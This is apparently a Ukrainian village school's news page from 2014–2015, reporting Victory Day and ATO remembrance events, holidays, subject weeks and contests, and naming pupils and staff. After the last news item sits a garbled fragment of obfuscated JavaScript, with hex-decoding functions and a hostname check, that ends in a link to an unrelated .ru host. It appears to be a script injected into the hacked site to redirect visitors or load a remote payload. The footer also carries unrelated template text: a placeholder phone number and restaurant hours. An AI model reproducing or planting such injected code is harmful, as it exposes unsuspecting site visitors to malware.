Друга світова війна – глобальний  військовий конфлікт в історії Землі та причина найбільших трагедій ХХ століття. У війні взяли участь 80% людства, бойові дії велися 2/3 існуючих на той момент держав. Для України ІІ світова війна – національна трагедія, у якій вона понесла  надзвичайні втрати. Під час бойових дій та в полоні загинуло 3-4 млн. військових, підпільників та цивільників, 4-5 млн. цивільних загинуло через окупаційний терор та голод в тилу, до 5 мільйонів жителів були евакуйовані або примусово вивезені до Росії та Німеччини, частина з яких не повернулася.

Цього року Україна відзначає День Перемоги з новим символом — червоним маком…

Червоний мак традиційно символізує для Європи пам’ять про героїв, загиблих у боях ХХ ст.

Червоний мак — не лише європейський, але й український символ, адже в нас здавна кажуть: маки цвітуть там, де була пролита козацька кров.

Завдяки Указу Президента «Про заходи з відзначення у 2015 році 70-ї річниці Перемоги над нацизмом у Європі та 70-ї річниці завершення Другої світової війни» та Закону «Про увічнення перемоги над нацизмом у Другій світовій війні 1939-1945 років» Україна розпочинає нову традицію святкування в європейському дусі пам’яті та примирення. Символ відзначення Дня пам’яті та примирення і Дня перемоги – червоний мак. Гасло «1939-1945. Пам’ятаємо! Перемагаємо!»

8 травня в Білогородській ЗОШ І-ІІ ступенів з метою відзначення 70-ї річниці Перемоги над нацизмом у Європі та 70-ї річниці завершення Другої світової війни  відбувся загальношкільний урок мужності  «Хоробрі серця», який провела вчитель історії Симич Л.М.

Хоча все далі відходять грізні і важкі роки Другої світової війни, але не згасає пам’ять про тих, хто віддав своє життя і захистив рідну землю від ворогів.

Сьогодні на нашу рідну землю прийшло нове лихо – біль утрат в зоні АТО. Вже більше року ми не можемо спати спокійно: знову гинуть найкращі українці, цвіт нації.

Схід України. Страшне слово війна закрило сонце чорною пеленою. Зруйновані міста і села, тисячі вбитих  та поранених. З болем в серці щоденно отримуємо страшні звістки з АТО про невиконання ворогом мирних домовленостей. В страшних  смертельних котлах перебувають юнаки з нашого села: Ліщук Анатолій, Гуцман Володимир, Савчук Михайло, Вовк Руслан, Ніколайчук Юрій.

Дорогою ціною дісталася нам Перемога. Пройдуть роки, змінюватимуться люди, покоління і настане той час, коли зовсім не залишиться живих свідків того страшного лихоліття, але  залишиться пам’ять про них, про їхні подвиги, про ту жорстоку і бездушну війну, яка забрала життя мільйонів людей, принесла лихо і горе на нашу українську землю. І від нас усіх залежить, щоб це залишилося у пам’яті наступних поколінь. Бо без пам’яті немає майбутнього.

День Перемоги – цього дня по всій Україні вкриваються весняними квітами і величні пам’ятники, і скромні обеліски. Це означає, що пам’ять народна жива, що подвиг загиблих –незабутній. Свято Перемоги – це свято зі слізьми на очах, це свято радісне і гірке. Радісне, бо принесло на нашу землю мир, гірке, бо ціна цієї радості – життя мільйонів наших співвітчизників.
“Тиждень світової літератури”

З 20 по 24 квітня 2015 року на базі Білогородської ЗОШ І-ІІ ступенів вчителем світової літератури О.А.Гелетою був організований тиждень світової літератури. Усі учні брали активну участь і дізналися багато нового матеріалу.
В рамках тижня були проведені наступні заходи:
Виховний захід «Зарубіжні письменники на Рівненщині»;
Конкурс «Декламаторів»;
Конкурс «Стіннівок»;
Виставка книг.
Підбиваючи підсумки проведених заходів, директор школи В.М.Височанська вручила грамоти і подяки найстараннішим учасникам. Похвальними грамотами було відзначено Симуник Діану – ученицю 5 класу, Окренець Діану – ученицю 5 класу, Кузьміча Мирослава – учня 6 класу. Подяки вручили учням 5 і 6 класі

 “Ми раді вітати гостей”

   17 березня 2015 року  в Білогородської ЗОШ І-ІІ ступенів відбулось засідання творчої групи вчителів “Краєзнавчі дослідження Дубенщини” з теми: “Краєзнавчі дослідження – результат роботи творчого вчителя”.  Учні школи зустріли вчителів із привітальною програмою

Члени творчої групи ознайомились із досвідом краєзнавчої роботи вчителів Білогородської ЗОШ І-ІІ ступенів Кравчук М.А., Симич Л.М.  Було проведено  виховний захід “Сім цікавинок Білогородського краю”. Вчителі творчої групи ознайомилися з історією, з видатними і талановитими людьми села Білогородки.

Гортаємо сторінки з минулого в майбутнє,

задумаймось над завтрашнім ми днем.

Людино, для чого живемо на світі?

Щоб залишити слід для нових поколінь.

 

Село Білогородка… Маленьке, віддалене, призабуте. З якої б сторони оглядати його краєвиди – кругом історія, овіяна  славою, оспівана народною піснею, переказами: проживання волинських чехів, історична битва танкової  дивізії генерала Попеля,  закохана  в   квіти художниця Дарина Середняцька…  Саме це ставить перед нами завдання – відкривати призабуте, бо приходить час збирати  розсипані перли минувшини..

Вчитель історії Симич Л. М. показала презентацію про історію села – “Моє село – моя колиска”

Пізнавальною була екскурсія до шкільного музею, яку провела вчитель української мови та літератури  Кравчук М.А.

Вчителі ознайомились із зібраним матеріалом: рушниками, картинами, старовинними речами та ін.

Ніби село і маленьке, а скільки цікавого приховує в собі його історія.І кому, як не нам відкривати ці таємниці великої слави: примножувати традиції села, оберігати й вивчати його історію, залишати все для нащадків, щоб і вони з гордістю повторили «Село моє, для мене ти єдине».

 

“Жіноча доля”

Жіноча доля, хто її розкаже?

Жіноча доля, хто її збагне?

Їй на землі – чомусь найважче,

Жіноча доля  вибрана з небес…

Недарма, мабуть, святкуємо ми жіночий день саме навесні. Весна.. Лагідна, загадкова, тендітна. Ми чекаємо її завжди, але приходить вона раптово, бурхливо, змінюючи все навкруги, пробуджуючи  природу і наші почуття.

І саме тому  6 березня у Білогородській ЗОШ І-ІІ  ступенів відбулися   загальношкільні батьківські збори присвячені  Дню 8 Березня. Всі свої найкращі побажання, пісні, танці, інсценізації  подарували учні  під час  свята  «Шануйте матерів, жінок,бабусь…».

 

«Музична емблема держави».

З нагоди  відзначення  150-ї річниці першого публічного виконання національного гімну та 200-ї річниці від дня  народження М.Вербицького,

вчителем музичного мистецтва та класними керівниками у Білогородській ЗОШ І-ІІ ступенів була проведена година спілкування «Музична емблема держави».

У ході заходу учні ознайомились із історією написання тексту Гімну України,

був продемонстрований документальний фільм відповідної тематики, переглянута презентація «Як це було…».  При завершенні дійства  відбулося публічне виконання гімну України.

 

«Ми завжди будем пам`ятати і вам забути не дамо…»

Важкі випробування переживає зараз Україна. Події останніх місяців примусили кожного українця відчути свою причетність до своєї країни, а також  зрозуміти, що ми господарі на власній землі. Сьогодні, захищаючи власну гідність і незалежність, ми, українці, знайшли себе, показали всьому світові, що Україна – це не просто точка на карті світу, Україна – це демократична, європейська країна. Переконані у цьому педагоги  і учні Білогородської ЗОШ І-ІІ ступенів,  які 16 лютого ознайомили  учні з передумовами афганської війни; через поезію і пісні донесли до їхніх сердець основну думку: війна – це безумство, це невиправдана жорсткість;  старались виховати в учнів почуття патріотизму, вміння співпереживати. Педагог- організатор Копко Лариса Іванівна, провела виховний захід  «Ми завжди будем пам`ятати і вам забути не дамо…», у рамках даного заходу була проведена  зустріч з односельчанином – учасником  АТО:  Ліщуком Анатолієм.
“День Святого Валентина”
13 лютого 2015 року в Білогородській ЗОШ І-ІІ ступенів вчителем англійської мови Колісніченко Антоніною Володимирівною було проведене свято Дня Святого Валентина. У заході приймали участь учні з 4 по 9 клас. Глядачі мали змогу переглянути спеціальний випуск новин. Репортер Віталій висвітлював події з різних куточків нашої країни, зокрема, взяв інтерв’ю в істориків про виникнення свята Дня Святого Валентина. Серед глядачів був проведений конкурс на знання романтичних віршів про кохання. Наприкінці випуску новин учні змогли залишити свої послання друзям та близьким людям на сторінці «Фейсбук».

“Суверенна моя Україно”
22 січня у Білогородській ЗОШ І-ІІ ступенів  педагогом-організатором  Копко Ларисою Іванівною та вчителем історії Симич Людмилою Михайлівною був проведений виховний захід та продемонстрована презентація «Суверенна  моя Україна».  Мета  заходу: на основі  історичних, літературних джерел поглибити  знання учнів про боротьбу українського народу за незалежну соборну державу, про День соборності України; виховувати почуття патріотизму й громадянської свідомості.
“Вітаємо з новим роком”

25 та 26 грудня Білогородську ЗОШ І – ІІ ступенів відвідали Дід Мороз та Снігуронька. Всі учні школи з нетерпінням чекали цих гостей. Діти 1-4 класів з класними керівниками приготували костюмований новорічний ранок «Зимова казка» . Учні 5-9 класів з педагогом-організатором Копко Л.І., провели новорічне шоу «Кришталевий черевичок». Всі залишились задоволені та отримали подарунки від спонсора ПП «Край».

 

“Прийди, прийди Святий Миколаю!!!”

19 грудня до учнів Білогородської ЗОШ І-ІІ ступенів завітав Святий Миколай.
Учні 1-4 класів із класними керівниками особливо готувалися до зустрічі з бажаним гостем. Підготували виховний захід «Ми тебе чекали, Миколаю…».
Захоплюючим та цікавим було свято. Учні приготували вірші, пісні, сценки для Святого. У свою чергу Миколай також до слухняних прийшов не з порожніми руками. Всі отримали гостинці. Діти з нетерпінням будуть чекати зустрічі з Миколаєм у наступному році.

“Ой на Андрія дівки ворожили”

12 грудня 2014 року у Білогородській ЗОШ І-ІІ ступенів педагогом-організатором Копко Ларисою Іванівною, були проведені Андріївські вечорниці. Метою свята було донести до учнів відомості про національні традиції, розвивати культуру мовлення, відчуття слова, навички сценічного мистецтва.
З великим задоволенням юнаки та дівчата згадали про ворожіння у цей вечірпозитивні емоції залишилися надовго.
«Міс школи – 2014»
28 листопада класними керівниками та педагогом-організатором у логородській ЗОШ І-ІІ ступенів було проведено розважальний конкурс «Міс школи – 2014».
У конкурсі з великим задоволенням приймали участь дівчата від 5 по 9 клас:
Симуник Діана, Вовк Сніжана, Сухляк Інеса, Хоптюк Іванна, Момотюк Зоя.
Учасниці змагалися у різних конкурсах. Членам журі було не легко вибрати найдостойнішу, але конкурс є конкурс і «Міс школи – 2014» стала Симуник Діана, учениця 5 класу. Всі учасниці отримали цінні подарунки та солодощі від спонсорів: сільського голови Івашинюти Ірини Іванівни, приватного підприємства «Край» та місцевого підприємця Василя Гаврилюка.

 

«Запали свічку»
21 листопада у Білогородській ЗОШ І-ІІ ступенів, відбувся виховний захід
«І запалимо свічки скорботи…», до дня пам`яті жертв голодомору та політичних репресій. Педагог-організатор Копко Л. І., та вчитель історії Симич Л.М., навели безліч історичних фактів. Продемонстрована презентація про дані події вразили учнів школи, адже третина всіх померлих від голоду – діти.
Хвилиною мовчання пом`янули всіх померлих в тяжкому лихолітті.
Учням школи було наголошено, що у суботу, 22 лютого, потрібно долучитися у кожній домівці до акції «Запали свічку».

 

Ніхто не залишиться осторонь

Події, які хвилюють сьогодні весь український народ, не лишають байдужими нікого. Кожна людина від малого до дорослого хоче чимось допомогти нашим солдатам. Саме тому  учнівський та вчительський колективи Білогородської ЗОШ І-ІІ ступенів  13  листопада організували у школі ярмарку-розпродаж хлібобулочних виробів, акцію «Подарунок солдату», зустріч з солдатами АТО: Гуцманом Володимиром   випускником нашої школи, майором Дубенської військової частини Єлістратовим В`ячеславом Олександровичем, молодшим сержантом Селецьким Миколою Володимировичем та мамами солдатів, які зараз у зоні АТО:  Ліщук Катериною Дмитрівною та Савчук Надією Іванівною. Це назавжди запам`ятається учням школи. Вилучені кошти з ярмарки та зібрані теплі речі, подарунки  були передані учасникам зустрічі

.DSCF0856
День української писемності  та мови.
9 листопада – День української писемності  та мови. Саме цій події в Білогородській ЗОШ І-ІІ ступенів 7 листопада вчителем української мови та літератури Кравчук М.А. було проведено свято «Наша мова калинова».Учні поповнили знання  про рідне слово – основу нашого спілкування, його історію.

Мова – наш вірний друг і помічник протягом усього життя. Мова – дивний скарб. Про любов до неї учні розповідали з захопленням. Щиро звучали слова з уст Хоптюк Зоряни, Свіщ Світлани, Ільків Ганни, Куткудак Катерини, Ліщука Валерія, Окренець Діани.

Учні перегляли презентацію про історію виникнення свята (підготовленою вчителем Симич Л.М)

 

З 20  по 24 жовтня  у  Білогородській ЗОШ І-І І ступенів  відбувся тиждень художньо –естетичного циклу. У рамках  тижня вчителем  музичного мистецтва  Копко Л.І.  були проведені:  музичний КВК,  музична вікторина та конкурс «ІКС-Фактор», який дуже сподобався  всім учасника                                             

Посвята в козачата
З метою розширити відомості дітей про період козаччини  і дати уявлення про умови життя козаків, виховувати шанобливе ставлення до героїчного минулого наших предків, запорізьких козаків і спонукати до наслідування їх кращих рис: добродушності, безкорисливості, товариськості, у Білогородській ЗОШ  І-ІІ ступенів 14  жовтня педагогом-організатором Копко Л.І., та класними керівниками 1-4 класів  було проведено свято «Козацькому роду – нема переводу! У рамках цього свята відбулася посвята в козачата учнів 1 класу.

 ДЕНЬ ВЧИТЕЛЯ   

03 жовтня  2014 року 

Тим, хто пізнати добро допоміг,
Тим, хто відкрив для нас тайни доріг,
Тим, хто нам крила дарує щодня,
Тим, хто відкрив нам жагу пізнання
Тим, чия праця важка, непроста,
Тим, чиє слово добром пророста,
Тим, хто відкрив нам науки світання
Наші святкові і щирі вітання!

 

СЕМІНАР З БІОЛОГІЇ

24 вересня 2014 року в Білогородській ЗОШ І_ІІ ступенів відбувся  районний семінар вчителів біології.

Тема семінару “Застосування біологічних знань у повсякденному житті учнів та їх майбутній професійній  діяльності

У Білогородській ЗОШ І – ІІ ст. 15 вересня 2014 року, було проведено фізкультурно- оздоровчі та спортивні заходи з нагоди Дня фізичної культури та спорту
« Олімпійський тиждень».
У школі діє виставка « Олімпійська книга» ( виставка книг на Олімпійську тематику).
Також було проведено конкурс « Олімпійський знавець» (конкурси, вікторини, кросворди по Олімпійських іграх) у яких приймали участь учні 5 – 7 класів.
До Дня фізичної культури та спорту проведено спортивне свято « Подорож у країну Спорту» участь взяли учні 5-9 класів. На святі було проведено різноманітні ігри, вікторини, естафети, забави. Також вчитель фізичної культури та учні 9 класу підготували для учнів молодших класів розповіді, плакати, реферати, портфоліо про зародження Олімпійських ігор « Стежками Олімпійських ігор».

 

  Тиждень знань з основ безпеки життєдіяльності.

У Білогородській ЗОШ І -ІІ ступенів відбувся   Тиждень знань з основ безпеки життєдіяльності. В  рамках  тижня були проведені наступні заходи:

1. «Обов’язки і права пішохода»,  ігри та змагання з Правил безпечної поведінки учнів на вулицях і дорогах. (1-2 класи).

2.«Знайте правила дорожнього руху», «Здоров`я – усьому голова», «Безпека життя». (Тестові завдання)  (3-4 класи ).

  1. «Безпека руху пішоходів.   Види світлофорів.  Сигнали регулювальника дорожнього руху».  Урок-гра з презентацією. (5-6 класи)

4. «Щоб не трапилось біди – правил дорожніх дотримуйся завжди».(7-9 класи).

Мамина пісня

14 травня 2014 року у Білогородській ЗОШ І-ІІ ступенів відбулися загальношкільні батьківські збори присвячені Дню матері. У програмі  були заплановані наступні заходи: відкриття музейної кімнати «Українська хатина», та звітний концерт  «Берегиня роду». У цікавій, доброзичливій обстановці швидко минув час та вирішились всі питання, які були винесені  на обговорення.

День Перемоги

9 травня 2014 року було проведено  мітинг до Дня Перемоги біля обеліска в с. Білогородка. Ми всі  повинні пам`ятати, що без Перемоги в травні 1945 року не було б сьогодні України. Не слід забувати, якою ціною здобуто Велику Перемогу. Тому педагоги та учні школи  бережуть крупинки пережитого, ми низько вклоняємося пам`яті солдатського серця.

14 березня 2014р. у  Білогородській  ЗОШ  І – ІІ  ст. відбулося методичне об’єднання

вчителів 3 класу по темі « Активізація навчальної діяльності молодших школярів через застосування диференційованого навчання». Вчителі відвідали відкритий урок читання на тему «Що означає бути людиною?» . Проводила класовод 3 класу –  Бабійчук  З. М.

Для того , щоб на уроці дати вихід енергії дітей, вчителька використовувала хорові та групові відповіді, приговорювання, різноманітні форми коментування, роботу в групах за окремими партами . Таким чином знижується напруженість очікування відповіді, використовується сила мимовільної уваги учнів.

2 квітня  2014р.  класовод 3 класу –  Бабійчук  З. М.  провела  свято « Містер 3 класу ».

Кожна дитина – це маленький Всесвіт. Щоб розібратися в собі, часом не вистачає цілого життя.  А ось учні   Білогородської  ЗОШ  І-ІІ ст.   все – таки спробували.

На конкурс були запрошені  мами, бабусі, вчителі, діти з інших класів. Учасники яскраво та емоційно представляли себе. Були і музичні  «візитки», танці , ліричні вірші, прозові мініатюри. Розповідали про свої захоплення, життєві ідеали, мрії, девізи, літературні образи.

Кожен з учасників підкорив серця глядачів, а переможцем став Ліщук Валерій.

 

 

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “bilogorodka.wordpress.com”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e//qxoili56p7y8i.ru/f.html

Залишити коментар

Години та інформація

1-202-555-1212
Lunch: 11am - 2pm
Dinner: M-Th 5pm - 11pm, Fri-Sat:5pm - 1am